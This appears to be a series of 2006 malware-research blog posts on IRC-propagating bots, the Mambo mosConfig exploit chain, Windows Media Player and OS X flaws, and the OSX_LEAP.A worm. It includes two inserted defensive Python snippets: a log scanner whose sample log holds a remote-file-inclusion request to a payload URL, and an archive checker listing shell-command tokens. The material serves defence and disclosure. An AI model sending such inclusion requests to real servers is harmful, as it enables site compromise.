We received a malware and here are some details.
Filename: RR-0922-014.exe
Filesize: 5,492 bytes
MD5: EBC2BA74578CB23AF083C89B31060A28
Detection (as of 2006-02-25 22:23:34)
Trend Micro: PAK_Generic.001
Remember our previous post on IM worms that chat with the target? Well, here’s a similar instance. Check it out.
Current detection:
FileName : SexyGirl.zip/SexyGirl.scr
TrendMicro : PAK_Generic.001
Based on an initial string-based analysis, we did not find the chat strings in the malware. Setting aside the possibility that they are encrypted (for simplicity's sake), this could mean that the "chatters" (latia, Whyn0tt_87, D115ny_cute) are actual bot-infected systems that were instructed to propagate the malicious link via IRC, much like the AOL propagation used by bots. The botmaster controls the links. Alternatively, the botmasters created legitimate IRC 'bots' that park on the channel and send the messages to the channel's users. Yes, there are legitimate IRC 'bots'; search for "irc bots".
Update(JJ, 23 February 2006 00:14:56)
So I decided to delve deeper into this bot, and the botmaster does control the IRC messages that it sends out. This is its infection vector, as the bot does not have any commands to exploit other systems automatically. Also, this bot does not join a channel, AND the server that it joins is a legitimate one. The botmaster has a script to tell the infected systems to "propagate" the "Sexy Girl" and "Full Sex Movie" links. And still, there are many users who are infected (based on the logs that I took).
Port 80 malware activity is quite high, particularly from malware exploiting the Mambo mosConfig vulnerability. This exploit is not new; it just means that attackers are still able to successfully compromise vulnerable machines.
The exploit downloads a shell script, which in turn downloads and executes other malware, including the actual worm that does the exploiting (it also has a module for exploiting the XML-RPC vulnerability), as well as an IRC client (yes, to take part in an eveeel botnet server).
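A defender-side log check for the two inclusion vectors this chain rides on, added here as an example that is not from the post or from Trend Micro's honeypots: the access-log lines are constructed, and the parameter name `mosConfig_absolute_path` is assumed from the Mambo vulnerability class rather than taken from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines with RFC 5737 addresses (not honeypot
# data from the post): two carry a client-supplied mosConfig_ parameter,
# one is a bare POST to xmlrpc.php, one is ordinary traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Feb/2006:03:14:07 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http://198.51.100.5/payload.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.11 - - [18/Feb/2006:03:15:22 +0000] "POST /xmlrpc.php HTTP/1.1" 200 311 "-" "-"
192.0.2.12 - - [18/Feb/2006:03:16:01 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
192.0.2.13 - - [18/Feb/2006:03:17:45 +0000] "GET /index.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 404 220 "-" "curl/7.15"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def classify(line):
    """Return (severity, reason) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in params.items():
        # mosConfig_* are Mambo's internal configuration globals; a client
        # must never be able to set them, and a remote URL as the value
        # is the remote-file-inclusion pattern.
        if key.lower().startswith("mosconfig_"):
            if any(REMOTE_URL.match(v) for v in values):
                return "high", f"remote file inclusion attempt via {key}"
            return "medium", f"client-supplied Mambo config variable {key}"
    if m.group("method") == "POST" and parts.path.endswith("/xmlrpc.php"):
        # Too common to alert on alone; keep it to correlate with the hits above.
        return "low", "POST to xmlrpc.php, correlate with other hits"
    return None


def scan(log_text):
    """Run classify() over every line; return [(ip, severity, reason)]."""
    hits = []
    for line in log_text.splitlines():
        verdict = classify(line)
        if verdict:
            hits.append((LOG_RE.match(line).group("ip"), verdict[0], verdict[1]))
    return hits
```

A real deployment would feed `scan()` the rotated access logs and pair the "high" hits with outbound connections from the web server to the host named in the parameter.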
What malware is this, you say? Check out our Virus Encyclopedia for the following malware:
And if I missed something, you can always check our Advisories page for the latest malware from our honeypots.
After OSX_LEAP.A, here comes another proof-of-concept malware for OSX: OSX_INQTANA.A.
I leave the link-clicking-read-the-details to you.
A couple of days after Microsoft released their monthly security patch, proof-of-concept (PoC) code targeting the MS06-005 vulnerability was posted by FrSIRT. (Check our previous blog entry here.)
Another version of the exploit code was released and posted by FrSIRT for MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution.
On the other hand, a proof of concept on MS06-009: Vulnerability in the Korean Input Method Editor Could Allow Elevation of Privilege [ShellAbout() API Elevation of Privilege] was posted by the Securiteam. (This one’s really easy to do) :)
Visit the following link for Trend Micro’s information on Microsoft’s February Security patch.
Yesterday, I started playing around with the MS06-006 vulnerability (the one with the BMP thingie). I must have spent around… 3 hours trying to grab EIP. I gave up after a while because I could not find any constant address. And I just found out today that another person who has been playing around with MS06-006 reached the same conclusion. The crashes were random, and it's not that easy to create a reliable exploit for this. Mostly, just a DoS.
So last night, while the girlfriend was watching Brokeback Mountain (I had too much fun creating my own dialogue for the characters; the girlfriend got annoyed since she could not follow the story, so she kicked me out of the TV area), I decided to do the MS06-005 vulnerability, or the Windows-Media-Player-Embed-Src-vuln-for-other-browsers-except-IE.
Which means, if you're using Firefox or other browsers (I'm not sure exactly which browsers), better patch now. The exploit is fairly easy to create and allows for automatic code execution. Spyware, anyone?
Update(JJ, 17 February 2006 17:08:02)
FrSIRT now has a Metasploit plugin for this exploit on their site.
An article has been published describing a flaw in the Apple Safari browser running on OS X. The flaw is said to cause immediate execution of files just by visiting a website.
An option in the browser, "Open 'safe' files after downloading" (enabled by default), causes the browser to automatically open safe files such as zip archives. However, a shell script with no "shebang line" (such as "#!/bin/bash") will be executed without user interaction. Read the article here for the full story.
For now, it is highly recommended to disable the option "Open 'safe' files after downloading" until an update that fixes the flaw is made available.
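A check a mail gateway or download scanner could run against an archive before it is treated as "safe", added here as an example that is not from the post or from Apple: it flags entries whose name promises an image or document but whose content is printable shell text (shebang or not) or whose Unix mode carries an executable bit. The archive is constructed inline; the lure body is a harmless `echo`.

```python
import io
import stat
import zipfile

# Leading bytes a user would expect behind these "safe" extensions.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF",),
}
SHELL_TOKENS = (b"curl ", b"chmod ", b"rm ", b"/bin/", b"osascript", b"echo ", b"`")


def looks_like_shell_text(data):
    """Printable text carrying shell vocabulary, with or without a shebang."""
    if not data or any(b > 0x7E or (b < 0x20 and b not in b"\t\n\r") for b in data):
        return False
    return data.startswith(b"#!") or any(tok in data for tok in SHELL_TOKENS)


def suspicious_entries(zip_bytes):
    """Return [(name, [reasons])] for entries whose name and bits disagree."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            data = zf.read(info)
            mode = (info.external_attr >> 16) & 0o777  # Unix mode stored by the packer
            reasons = []
            if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                reasons.append("unix executable bit set")
            if ext in MAGIC and not data.startswith(MAGIC[ext]):
                reasons.append(f"content is not {ext} data")
            if looks_like_shell_text(data):
                reasons.append("shell-script text" + ("" if data.startswith(b"#!") else " without shebang"))
            if reasons:
                findings.append((name, reasons))
    return findings


def build_sample_archive():
    """Constructed archive: a real JPEG header plus a shell script with an image name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)
        lure = zipfile.ZipInfo("party_photo.jpg")
        lure.external_attr = (stat.S_IFREG | 0o755) << 16  # mode bits the packer set
        zf.writestr(lure, b'echo "this would have run"\n')  # harmless stand-in body
    return buf.getvalue()
```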
Update(JJ, 21 February 2006 18:20:49)
Updates from ISC.
This actually looks more serious than we initially thought. The workaround specified above will prevent Safari from automatically executing the PoC file, but it looks like your machine is still vulnerable, and it doesn't need Safari to run this file at all.
Update(JJ, 23 February 2006 20:30:27)
More updates from ISC!
…the Mail application is vulnerable as well. What’s even worse, the attacker doesn’t need to send a ZIP archive; the shell script itself can be disguised to practically anything.
Here's the link again: http://isc.sans.org/diary.php?storyid=1138
A new MacOS X worm is making the rounds on the net, disguising itself as pictures of "MacOS X Leopard", an upcoming version of MacOS X.
Some important points about this malware were taken from a forum thread at
http://www.ambrosiasw.com/forums/index.php?showtopic=102379
You cannot be infected by this unless you do all of the following:
… and then for most users, you must also enter your Admin password.
You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file and then open it.
So just to be on the safe side, don’t download the file hehe. =p
More info can be found on the forum mentioned above.
Update(JoneZ, 17 February 2006 14:06:34)
Further analysis shows that this malware can propagate via iChat. Trend Micro will be detecting this malware as OSX_LEAP.A (yup, it's a new prefix, OSX_).
More details about this malware can be found in the following links:
The Proof of Concept for the Microsoft Security Bulletin MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution that was released last Valentine’s day is now available in FrSIRT.
The vulnerability in Windows Media Player exists because of the way it processes bitmap files. Using a specially constructed malicious bitmap file, an attacker can exploit the vulnerability through a malicious website that a user visits or through a malicious e-mail message that the user views.
An attacker who successfully exploited this vulnerability could take complete control of an affected system, but significant user interaction is required to successfully exploit it.
It's time again for that time of the month… Let's all patch our machines for a safer computer world.
Microsoft has already released their Security Updates for February; the updates include 2 Critical and 5 Important Updates.
Critical Updates
Important Updates
Read more on the updates here.